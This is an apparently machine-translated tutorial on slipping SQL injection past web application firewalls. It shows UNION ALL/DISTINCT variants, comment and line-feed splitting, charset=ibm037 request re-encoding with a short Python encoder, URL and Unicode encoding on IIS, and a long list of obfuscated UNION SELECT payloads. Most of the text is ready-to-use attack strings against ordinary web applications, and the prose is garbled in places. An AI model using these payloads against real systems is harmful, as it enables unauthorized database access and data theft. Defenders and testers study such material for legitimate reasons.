One 、 Use ALL perhaps DISTINCT Bypass

 Remove the repetition value ：
select 1,2 from users where user_id=1 union DISTINCT select 1,2;
select 1,2 from users where user_id=1 union select DISTINCT 1,2;
 Show all ：
select 1,2 from users where user_id=1 union all select 1,2;
select 1,2 from users where user_id=1 union select all 1,2;

Two 、 Wrap around

 At present a lot of  waf  Will be right.  union select  Filtering , Because it is necessary to use these two keywords for joint query , Generally filter these two characters , If you want to use joint query 
 Difficult. . You can use line feed , Add some comments to bypass .

1、 Grab the bag

2、 Modify the parameters

id=-1 
/* aogja gaogjaohoah gjaogja */
union select 1,user()-- &submit=1

3、 ... and 、HTTP Data encoding bypasses

1、 Principle introduction

 Code bypass , Around  waf  It is also often encountered in , Usually  waf  Just stick to the code he recognizes , For example, it only recognizes  utf-8  The characters of , But the server can recognize more than  
utf-8  More coding .
 Then we just need to  payload  according to  waf  Not recognized, but the server can parse the recognized encoding format , You can bypass .
 For example, in the request package, we can change Content-Type Medium charset Parameter values for , Let's change it to ibm037 This protocol is encoded , Some servers are supported .payload  Change to 
 This protocol format is OK .

Content-Type: application/x-www-form-urlencoded; charset=ibm037

 Script ：
import urllib.parse
s = 'id=-1 union select 1,user()-- &submit=1'
ens=urllib.parse.quote(s.encode('ibm037'))
print(ens)

Four 、 url Code bypass

 stay  iis  It will automatically turn  url  The encoding is converted into a string and transmitted to the program for execution . for example  union select  It can be converted into  u%6eion s%65lect

5、 ... and 、Unicode Code bypass

 form ：“\u” Or is it “%u” add  4  position  16  Base number  Unicode  Code value .
iis  This code will be automatically recognized , There are parts  waf  It doesn't block this kind of coding .

6、 ... and 、union select Bypass

 At present, a lot of  waf  Can use, can be right  union select  To intercept , Single non interception , Intercept together .

sel<>ect  Program filtering <> It's empty   Script processing 
sele/**/ct  Program filtering /**/ It's empty 
/*!%53eLEct*/ url  Encoding and inline comments 
se%0blect  Use spaces to bypass 
sele%ct  Use the percent sign to bypass 
%53eLEct  Code bypass 
 Case write 
uNIoN sELecT 1,2
union all select 1,2
union DISTINCT select 1,2
null+UNION+SELECT+1,2
/*!union*//*!select*/1,2
union/**/select/**/1,2
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
/*!50000union*//*!50000select*/1,2
/*!40000union*//*!40000select*/1,2
%0aunion%0aselect 1,2
%250aunion%250aselect 1,2
%09union%09select 1,2
%0caunion%0cselect 1,2
%0daunion%0dselect 1,2
%0baunion%0bselect 1,2
%0d%0aunion%0d%0aselect 1,2
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
/*!12345union*//*!12345select*/1,2;
/* chinese */union/* chinese */select/* chinese */1,2;
/*!union*//*!00000all*//*!00000select*/1,2;